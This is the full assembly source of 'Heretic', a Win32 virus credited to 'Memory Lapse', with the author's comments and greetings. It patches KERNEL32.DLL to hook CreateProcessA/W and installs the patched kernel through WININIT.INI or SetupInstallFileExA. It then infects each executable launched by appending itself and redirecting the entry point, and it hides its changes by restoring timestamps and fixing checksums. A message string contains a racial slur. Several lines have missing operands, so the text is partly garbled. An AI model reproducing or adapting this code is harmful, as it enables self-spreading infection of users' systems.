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- ;
- ;
- ; Heretic - A Microsoft Windows 32 virus
- ;
- ;
- ; Memory Lapse, [NOP]
- ; formerly of Phalcon/Skism
- ;
- ;
- ; This virus works under all beta versions of Windows 9x, and Windows NT 4.0.
- ; Under a Win32s environment, the virus will fail since the kernel doesn't
- ; physically export any useable API. Parsing the import table of the host image
- ; for GetProcAddress and GetModuleHandle should do the trick.
- ;
- ;
- ; Finally after seven months (including a four month hiatus for university),
- ; I've finally finished this virus.
- ;
- ; Ideally when the kernel is infected, the object the virus extends
- ; (typically .reloc) should have its flags with IMAGE_SCN_MEM_WRITE turned off.
- ; This will prevent in-memory patching by antivirus software. Heretic does
- ; not do this. At least not yet.
- ;
- ; Useful reading material: Microsoft Platform, SDK, and DDK Documentation
- ;
- ; Greets to priest, h8, lookout, virogen and johnny panic.
- ;
- .386
- locals
- .model flat, stdcall
- .code
- .radix 16
- include
- CRC_POLY equ 0EDB88320
- crc macro string
- crcReg = CRC_INIT
- irpc _x,
- ctrlByte = '&_x&' xor (crcReg and 0ff)
- crcReg = crcReg shr 8
- rept 8
- ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1))
- endm
- crcReg = crcReg xor ctrlByte
- endm
- dd crcReg
- endm
- MARKER equ "DOS lives somewhere in time"
- org 0
- start: push L offset host - start ;location of old entry point
- ddOldEntryPoint = dword ptr $ - 4
- pushfd ;save state
- pushad
- call @@delta
- @@delta:pop ebp
- sub ebp,offset @@delta - start
- ;thanks vg!
- db 81,0edh ;sub ebp,unsignedlong
- ddEntryPoint dd 0
- add [esp+24],ebp ;return address of host
- mov edi,[esp+28] ;get a "random" pointer from stack
- and edi,0FFFF0000 ;mask off bottom word
- call try
- catch: mov esp,[esp+8] ;get pointer to our stack-based
- ; exception record
- jmp finally ;and return to host
- try: push dword ptr fs:[0] ;this is our try { } block
- mov fs:[0],esp ;create stack-based exception record
- .repeat
- dec edi ;move back a byte
- lea eax,[edi-MAGIC] ;thanks h8!
- cmp [edi],eax ;match? then we've found the kernel
- .until zero?
- mov esi,[eax+exe_str.pe_offset]
- add esi,eax ;traverse PE header and find
- ; Export Data Directory Table
- mov ebp,[esi+pe_str.export_tbl]
- add ebp,eax ;RVA -> absolute
- push eax
- push [ebp+edt_str.edt_ord_base]
- mov ebx,[ebp+edt_str.edt_ord_rva]
- mov edi,[ebp+edt_str.edt_name_rva]
- mov ebp,[ebp+edt_str.edt_addr_rva]
- add ebx,eax ;adjust ordinal table pointer
- add edi,eax ;adjust name pointer table pointer
- add ebp,eax ;adjust address pointer table pointer
- push ebp ;we save these values onto the stack
- push eax ; so we can free up registers
- call @@delta
- @@delta:pop ebp
- sub ebp,offset @@delta
- push ebp
- ; on entry:
- ; [esp] : delta offset
- ; [esp+4] : image base
- ; [esp+8] : address pointer table
- ; [esp+0c] : ordinal base
- ; ebx - ordinal table
- ; esi - pointer to our list of apis
- ; edi - name pointer table
- lea esi,[ebp+name_ptr_api]
- mov ecx,1
- mov edx,(name_ptr_api_end - name_ptr_api) / 4
- top: push edx
- push esi
- mov esi,[edi] ;calculate absolute offset of
- add esi,[esp+0c] ; name pointer (image base)
- mov edx,CRC_INIT
- lup: lodsb
- or al,al ;termination token? then quit
- jz chkCRC
- xor dl,al
- mov al,8
- .repeat ;perform CRC-32 on string
- shr edx,1 ;thanks jp!
- .if carry?
- xor edx,CRC_POLY
- .endif
- dec al
- .until zero?
- jmp lup
- chkCRC: pop esi
- push edi
- mov ebp,ecx
- shl ebp,1 ;convert count into word index
- movzx eax,word ptr [ebx+ebp] ;calculate ordinal index
- sub eax,[esp+14] ;relative to ordinal base
- shl eax,2 ;convert ordinal into dword index
- mov ebp,eax
- mov edi,[esp+10]
- add eax,edi ;calculate offset
- mov edi,[edi+ebp] ;RVA of API (dereference said offset)
- add edi,[esp+0c] ;convert to absolute offset
- mov ebp,[esp+8]
- cmp edx,CRC_POLY ;CreateProcessA?
- org $ - 4
- crc
- .if zero?
- mov [ebp+lpCreateProcessA],eax ;hook it
- mov [ebp+CreateProcessA],edi
- .endif
- cmp edx,CRC_POLY ;or CreateProcessW?
- org $ - 4
- crc
- .if zero?
- mov [ebp+lpCreateProcessW],eax ;hook it
- mov [ebp+CreateProcessW],edi
- .endif
- cmp edx,[esi] ;or an API the virus uses?
- .if zero?
- mov [esi+(name_ptr_api_end - name_ptr_api)],edi
- lodsd ;update pointer
- dec dword ptr [esp+4] ;decrement our API count
- .endif
- pop edi
- next: pop edx
- add edi,4 ;next API
- inc ecx ;remember displacement
- or edx,edx ;no more names to parse?
- jnz top
- pop ebp ;restore delta offset
- add esp,0c ;clear stack
- call [ebp+GlobalAlloc], \ ;allocate memory for global structure
- L size vir_str
- mov edi,eax
- pop [edi+vir_str.lpKernelBase]
- call kernel ;attempt to infect the kernel
- call [ebp+GlobalFree], \ ;release global structure resources
- edi
- finally:pop dword ptr fs:[0] ;this is our finally { } block
- pop eax ;trash exception handler address
- ;low and behold, the stack is restored
- popad
- popfd
- ret
- db '[nop] 4 life.. lapse, vg and jp own you! :)'
- infect: mov [edi+vir_str.ddError],TRUE ;assume an error occurred
- call [ebp+GetFileAttributesA], \
- [edi+vir_str.lpFileName]
- mov [edi+vir_str.ddFilterAttributes],eax
- inc eax
- jz exit
- call [ebp+SetFileAttributesA], \ ;strip file attributes
- [edi+vir_str.lpFileName], \
- or eax,eax ;error? possibly a r/o disk?
- jz exit
- call [ebp+CreateFileA], \
- [edi+vir_str.lpFileName], \
- NULL, \
- mov [edi+vir_str.hFile],eax ;if we don't get a valid file
- inc eax ;descriptor (ie. an invalid handle),
- jz exitChmod ;quit processing
- lea eax,[edi+vir_str.ddLastWriteTime]
- lea ecx,[edi+vir_str.ddLastAccessTime]
- lea edx,[edi+vir_str.ddCreationTime]
- call [ebp+GetFileTime], \ ;save file timestamps
- [edi+vir_str.hFile], \
- edx, \
- ecx, \
- eax
- call [ebp+CreateFileMappingA], \ ;create a mmap object
- [edi+vir_str.hFile], \
- NULL, \
- L 0, \
- L 0, \
- or eax,eax
- jz exitTime
- mov [edi+vir_str.hFileMappingObject],eax
- call [ebp+MapViewOfFile], \ ;view the file in our address space
- [edi+vir_str.hFileMappingObject], \
- L 0, \
- L 0, \
- L 0
- or eax,eax
- jz exitCloseMap
- mov [edi+lpBaseAddress],eax
- cmp word ptr [eax],IMAGE_DOS_SIGNATURE
- jnz exitUnmap ;some sort of executable?
- mov esi,eax
- add esi,[eax+exe_str.pe_offset] ;seek to NT header
- push eax
- call [ebp+IsBadCodePtr], \ ;can we read the memory at least?
- esi ;potentially not a Windows file?
- or eax,eax
- pop eax
- jnz exitUnmap
- cmp dword ptr [esi],IMAGE_NT_SIGNATURE
- jnz exitUnmap ;PE file?
- cmp [esi+pe_str.timestamp],CRC_POLY
- org $ - 4
- crc MARKER
- jz exitUnmap
- lea eax,[ebp+infectKernel]
- cmp [edi+vir_str.lpInfectMethod],eax;attempting to infect KERNEL32.DLL?
- .if !zero?
- test [esi+pe_str.flags],IMAGE_FILE_DLL
- jnz exitUnmap ;and not a runtime library?
- .endif
- call getLastObjectTable
- mov eax,[ebx+obj_str.obj_psize]
- add eax,[ebx+obj_str.obj_poffset]
- add eax,(_end - start) ;calculate maximum infected file size
- mov ecx,[esi+pe_str.align_file]
- call align
- mov [edi+vir_str.ddFileSizeInfected],eax
- call [ebp+UnmapViewOfFile], \
- [edi+vir_str.lpBaseAddress]
- call [ebp+CloseHandle], \
- [edi+vir_str.hFileMappingObject]
- call [ebp+CreateFileMappingA], \ ;reopen and extend mmap file
- [edi+vir_str.hFile], \
- NULL, \
- L 0, \
- [edi+vir_str.ddFileSizeInfected], \
- mov [edi+vir_str.hFileMappingObject],eax
- call [ebp+MapViewOfFile], \
- [edi+vir_str.hFileMappingObject], \
- L 0, \
- L 0, \
- L 0
- mov [edi+vir_str.lpBaseAddress],eax
- add eax,[eax+exe_str.pe_offset]
- mov esi,eax
- call getLastObjectTable
- mov eax,[ebx+obj_str.obj_rva] ;set new entry point if an EXE
- add eax,[ebx+obj_str.obj_psize] ; or set hooks if kernel32.dll
- call [edi+vir_str.lpInfectMethod]
- push edi
- push esi
- mov edi,[edi+vir_str.lpBaseAddress]
- add edi,[ebx+obj_str.obj_poffset]
- add edi,[ebx+obj_str.obj_psize]
- lea esi,[ebp+start]
- mov ecx,(_end - start)
- cld
- rep movsb ;copy virus
- pop esi
- pop eax
- xchg eax,edi
- sub eax,[edi+vir_str.lpBaseAddress] ;new psize = old psize + (_end - start)
- sub eax,[ebx+obj_str.obj_poffset]
- mov ecx,[esi+pe_str.align_file]
- call align ;calculate new physical size
- mov [ebx+obj_str.obj_psize],eax
- mov eax,[ebx+obj_str.obj_vsize]
- add eax,(_end - start)
- mov ecx,[esi+pe_str.align_obj]
- call align ;calculate potential new virtual size
- cmp eax,[ebx+obj_str.obj_psize] ;if new physical size > new virtual size
- .if carry?
- mov eax,[ebx+obj_str.obj_psize] ;then let the virtual size = physical size
- .endif
- mov [ebx+obj_str.obj_vsize],eax
- add eax,[ebx+obj_str.obj_rva]
- cmp eax,[esi+pe_str.size_image] ;infected host increased in image size?
- .if !carry?
- mov [esi+pe_str.size_image],eax
- .endif
- mov [esi+pe_str.timestamp],CRC_POLY
- org $ - 4
- crc MARKER
- lea eax,[ebp+szImageHlp]
- call [ebp+LoadLibraryA], \ ;load image manipulation library
- eax
- or eax,eax
- .if !zero?
- push eax ;(*) argument for FreeLibrary()
- lea ecx,[ebp+szChecksumMappedFile]
- call [ebp+GetProcAddress], \ ;get address of image checksum api
- eax, \
- ecx
- or eax,eax
- .if !zero?
- lea ecx,[esi+pe_str.pe_cksum]
- lea edx,[edi+vir_str.ddBytes]
- call eax, \ ;calculate checksum
- [edi+vir_str.lpBaseAddress], \
- [edi+vir_str.ddFileSizeInfected], \
- edx, \
- ecx
- .endif
- call [ebp+FreeLibrary] ;argument is set at (*)
- .endif
- mov [edi+vir_str.ddError],FALSE ;no errors!
- exitUnmap:
- call [ebp+UnmapViewOfFile], \ ;unmap the view
- [edi+vir_str.lpBaseAddress]
- exitCloseMap:
- call [ebp+CloseHandle], \ ;remove mmap from our address space
- [edi+vir_str.hFileMappingObject]
- exitTime:
- lea eax,[edi+vir_str.ddLastWriteTime]
- lea ecx,[edi+vir_str.ddLastAccessTime]
- lea edx,[edi+vir_str.ddCreationTime]
- call [ebp+SetFileTime], \ ;restore file time
- [edi+vir_str.hFile], \
- edx, \
- ecx, \
- eax
- call [ebp+CloseHandle], \ ;close the file
- [edi+vir_str.hFile]
- exitChmod:
- call [ebp+SetFileAttributesA], \ ;restore file attributes
- [edi+vir_str.lpFileName], \
- [edi+vir_str.ddFilterAttributes]
- exit: ret ;return to caller
- kernel: call [ebp+GlobalAlloc], \ ;allocate memory for source buffer
- mov [edi+vir_str.lpSrcFile],eax
- call [ebp+GetSystemDirectoryA], \ ;store %sysdir% in source buffer
- eax, \
- call [ebp+GlobalAlloc], \ ;allocate memory for destination buffer
- mov [edi+vir_str.lpDstFile],eax
- call [ebp+GetWindowsDirectoryA], \ ;store %windir% in destination buffer
- eax, \
- lea eax,[ebp+szKernel]
- call [ebp+lstrcatA], \ ;*lpSrcFile = %sysdir%\kernel32.dll
- [edi+vir_str.lpSrcFile], \
- eax
- lea eax,[ebp+szKernel]
- call [ebp+lstrcatA], \ ;*lpDstFile = %windir%\kernel32.dll
- [edi+vir_str.lpDstFile], \
- eax
- call [ebp+CopyFileA], \
- [edi+vir_str.lpSrcFile], \ ;%sysdir%\kernel32.dll
- [edi+vir_str.lpDstFile], \ ; -> %windir%\kernel32.dll
- lea eax,[ebp+infectKernel]
- mov [edi+lpInfectMethod],eax ;we're trying to infect the kernel
- mov eax,[edi+vir_str.lpDstFile]
- mov [edi+vir_str.lpFileName],eax
- call infect
- .if [edi+vir_str.ddError] == FALSE
- lea eax,[ebp+szSetupApi]
- call [ebp+LoadLibraryA], \
- eax
- or eax,eax ;if LoadLibrary fails, explicitly write
- .if zero? ;to WININIT.INI (Windows 95)
- lea eax,[ebp+szWinInitFile] ;delete the original kernel
- push eax
- push [edi+vir_str.lpSrcFile]
- lea eax,[ebp+szKeyName]
- push eax
- lea eax,[ebp+szAppName]
- push eax
- call [ebp+WritePrivateProfileStringA]
- lea eax,[ebp+szWinInitFile] ;move our patched kernel
- push eax
- push [edi+vir_str.lpDstFile]
- push [edi+vir_str.lpSrcFile]
- lea eax,[ebp+szAppName]
- push eax
- call [ebp+WritePrivateProfileStringA]
- .else
- push eax ;(*) argument for FreeLibrary
- lea ebx,[ebp+szSetupInstallFileExA] ;fetch address of API from this DLL
- call [ebp+GetProcAddress], \
- eax, \
- ebx
- or eax,eax
- .if !zero?
- lea ebx,[edi+ddBytes]
- call eax, \ ;move patched kernel
- NULL, \ ;NT->delay until next reboot
- NULL, \ ; modified MoveFileEx behaviour?
- [edi+vir_str.lpDstFile], \ ;98->WININIT.INI
- NULL, \
- [edi+vir_str.lpSrcFile], \
- NULL, \
- NULL, \
- ebx
- .endif
- mov esi,eax
- call [ebp+FreeLibrary]
- mov eax,esi
- .endif
- or eax,eax
- .if zero?
- mov [edi+vir_str.ddError],TRUE
- .endif
- .endif
- .if [edi+vir_str.ddError] == TRUE
- call [ebp+DeleteFileA], \ ;delete %windir%\kernel32.dll if
- [edi+vir_str.lpFileName] ; an error infecting or moving
- .endif
- call [ebp+GlobalFree], \ ;deallocate destination buffer
- [edi+vir_str.lpDstFile]
- call [ebp+GlobalFree], \ ;deallocate source buffer
- [edi+vir_str.lpSrcFile]
- ret
- infectKernel:
- xchg eax,ecx
- movzx eax,[esi+pe_str.size_NThdr]
- add eax,esi
- add eax,offset pe_str.majik
- mov edx,0
- lpCreateProcessA = dword ptr $ - 4
- sub edx,[edi+vir_str.lpKernelBase]
- @@lup: cmp [eax+obj_str.obj_rva],edx ;was the API in the previous object?
- ja @@next
- add eax,size obj_str ;next object
- jmp @@lup
- @@next: sub eax,size obj_str ;seek back to export object
- push L offset hookCreateProcessA - start
- call trapAPI
- mov edx,0
- lpCreateProcessW = dword ptr $ - 4
- sub edx,[edi+vir_str.lpKernelBase]
- push L offset hookCreateProcessW - start
- call trapAPI
- ret
- infectEXE:
- mov [ebp+ddEntryPoint],eax
- xchg eax,[esi+pe_str.rva_entry]
- mov [ebp+ddOldEntryPoint],eax
- ret
- trapAPI:push ebx
- push ecx
- mov ebx,[eax+obj_str.obj_poffset]
- sub ebx,[eax+obj_str.obj_rva]
- add ebx,[edi+vir_str.lpBaseAddress]
- add ebx,edx
- add ecx,[esp+0c]
- mov [ebx],ecx
- pop ecx
- pop ebx
- ret 4
- align: xor edx,edx
- add eax,ecx
- dec eax
- div ecx
- mul ecx
- ret
- getLastObjectTable:
- movzx eax,[esi+pe_str.num_obj]
- cdq
- mov ecx,L size obj_str
- dec eax
- mul ecx
- movzx edx,[esi+pe_str.size_NThdr]
- add eax,edx
- add eax,esi
- add eax,offset pe_str.majik ;seek to last object table
- xchg eax,ebx
- ret
- ;on entry:
- ; [esp] : return address to caller
- ; [esp+4] -> [esp+28] : registers
- ; [esp+2c] : return address to process
- ; [esp+34] : commandline
- hookInfectUnicode:
- call @@delta
- @@delta:pop ebp
- sub ebp,offset @@delta
- mov edi,[esp+34]
- call [ebp+WideCharToMultiByte], \ ;find out how many bytes to allocate
- CP_ACP, \ ; ANSI code page
- L 0, \ ; no composite/unmapped characters
- edi, \ ; lpWideCharStr
- L -1, \ ; calculate strlen(lpWideCharStr)+1
- NULL, \ ; no buffer
- L 0, \ ; tell us how many bytes to allocate
- NULL, \ ; ignore unmappable characters
- NULL ; don't tell us about problems
- or eax,eax ;no bytes can be converted?
- jz hookInfectError ;then bomb out.
- push eax ;(*)
- call [ebp+GlobalAlloc], \ ;allocate enough memory for the
- GMEM_FIXED, \ ; converted UNICODE string
- eax
- or eax,eax ;any memory available?
- pop ecx ;(*)
- jz hookInfectError
- mov esi,eax
- mov edi,[esp+34]
- call [ebp+WideCharToMultiByte], \ ;UNICODE -> ANSI conversion
- CP_ACP, \ ; ANSI code page
- L 0, \ ; no composite/unmappable characters
- edi, \ ; lpWideCharStr
- L -1, \ ; calculate strlen(lpWideCharStr)+1
- esi, \ ; destination buffer for ANSI characters
- ecx, \ ; size of destination buffer
- NULL, \ ; ignore unmappable characters
- NULL ; don't tell us about problems
- jmp hookInfectDispatch
- ;on entry:
- ; [esp] : return address to caller
- ; [esp+4] -> [esp+28] : registers
- ; [esp+2c] : return address to process
- ; [esp+34] : commandline
- hookInfectAnsi:
- call @@delta
- @@delta:pop ebp
- sub ebp,offset @@delta
- mov edi,[esp+34] ;get the filename
- call [ebp+lstrlenA], \ ;calculate string length
- edi ; (not including null terminator)
- or eax,eax ;zero length?
- jz hookInfectError
- inc eax ;include null terminator
- call [ebp+GlobalAlloc], \ ;allocate some memory for the copy
- eax
- or eax,eax ;no memory?
- jz hookInfectError
- mov esi,eax
- call [ebp+lstrcpyA], \ ;*edi -> *esi
- esi, \
- edi
- hookInfectDispatch:
- push esi ;(*) argument for GlobalFree
- call [ebp+GlobalAlloc], \ ;instantiate our global structure
- L size vir_str
- or eax,eax ;fatal error if no memory
- jz hookInfectErrorFree
- mov edi,eax
- mov [edi+vir_str.lpFileName],esi
- mov [edi+vir_str.ddError],FALSE ;assume no parsing fix-ups required
- lodsb
- cmp al,'"'
- .if zero?
- mov [edi+vir_str.lpFileName],esi
- mov [edi+vir_str.ddError],TRUE ;parsing fix-ups required
- .endif
- hookInfectParse:
- lodsb ;get a byte
- .if [edi+vir_str.ddError] == TRUE ;need a fix-up?
- cmp al,'"' ;'"' is our terminator
- jnz hookInfectParse
- .else ;no fix-up required
- cmp al,' ' ;' ' or \0 is our terminator
- jz hookInfectParsed
- or al,al
- jnz hookInfectParse
- .endif
- hookInfectParsed:
- mov byte ptr [esi-1],NULL ;null terminate string
- lea eax,[ebp+infectEXE] ;we're infecting a non-kernel32 executable
- mov [edi+vir_str.lpInfectMethod],eax
- call infect
- call [ebp+GlobalFree], \ ;deallocate global structure
- edi
- hookInfectErrorFree:
- call [ebp+GlobalFree] ;deallocate lpFileName
- hookInfectError:
- ret
- hookCreateProcessW:
- push CRC_POLY
- CreateProcessW = dword ptr $ - 4
- hookUnicode:
- pushfd
- pushad
- call hookInfectUnicode
- popad
- popfd
- ret
- hookCreateProcessA:
- push CRC_POLY
- CreateProcessA = dword ptr $ - 4
- hookAnsi:
- pushfd
- pushad
- call hookInfectAnsi
- popad
- popfd
- ret
- className db '[Heretic] by Memory Lapse',0
- message db 'For my thug niggaz.. uptown baby, uptown.',0
- szKernel db '\KERNEL32.DLL',0
- szImageHlp db 'IMAGEHLP',0
- szChecksumMappedFile db 'CheckSumMappedFile',0
- szSetupApi db 'SETUPAPI',0
- szSetupInstallFileExA db 'SetupInstallFileExA',0
- szWinInitFile db 'WININIT.INI',0
- szAppName db 'Rename',0
- szKeyName db 'NUL',0
- name_ptr_api:
- ddCloseHandle: crc
- ddCopyFileA: crc
- ddCreateFileA: crc
- ddCreateFileMappingA: crc
- ddDeleteFileA: crc
- ddFreeLibrary: crc
- ddGetFileAttributesA: crc
- ddGetFileTime: crc
- ddGetProcAddress: crc
- ddGetSystemDirectoryA: crc
- ddGetWindowsDirectoryA: crc
- ddGlobalAlloc: crc
- ddGlobalFree: crc
- ddIsBadCodePtr: crc
- ddLoadLibraryA: crc
- ddMapViewOfFile: crc
- ddSetFileAttributesA: crc
- ddSetFileTime: crc
- ddUnmapViewOfFile: crc
- ddWideCharToMultiByte: crc
- ddWritePrivateProfileStringA: crc
- ddlstrcatA: crc
- ddlstrcpyA: crc
- ddlstrlenA: crc
- name_ptr_api_end:
- ; absolute offsets of desired API
- CloseHandle dd 0
- CopyFileA dd 0
- CreateFileA dd 0
- CreateFileMappingA dd 0
- DeleteFileA dd 0
- FreeLibrary dd 0
- GetFileAttributesA dd 0
- GetFileTime dd 0
- GetProcAddress dd 0
- GetSystemDirectoryA dd 0
- GetWindowsDirectoryA dd 0
- GlobalAlloc dd 0
- GlobalFree dd 0
- IsBadCodePtr dd 0
- LoadLibraryA dd 0
- MapViewOfFile dd 0
- SetFileAttributesA dd 0
- SetFileTime dd 0
- UnmapViewOfFile dd 0
- WideCharToMultiByte dd 0
- WritePrivateProfileStringA dd 0
- lstrcatA dd 0
- lstrcpyA dd 0
- lstrlenA dd 0
- _end:
- host: call MessageBoxA, \
- NULL, \
- L offset lpText, \
- L offset lpCaption, \
- L 0 ;MB_OK
- call ExitProcess, \
- L 0
- .data
- lpCaption db 'Memory Lapse has something to say..',0
- lpText db 'Hello World!',0
- end start
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